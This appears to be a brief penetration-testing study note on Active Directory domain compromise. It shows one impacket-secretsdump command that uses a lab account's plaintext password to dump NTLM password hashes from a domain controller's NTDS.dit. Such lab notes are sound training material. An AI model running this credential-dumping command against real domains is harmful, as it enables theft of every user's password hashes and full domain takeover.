Ju-On/Offensive-Security/Attacking AD 4: Domain Compromise.md

 ![image](https://github.com/user-attachments/assets/dfe18c4b-7172-4012-8155-1c74bbd42f97)

-Using -just-dc-ntlm with secrets dump
+Using -just-dc-ntlm with secretsdump will only dump out the NTDS.dit, filtering out the other data as the name implies.

     impacket-secretsdump MARVEL.local/hawkeye:'Password1@'@192.168.64.138 -just-dc-ntlm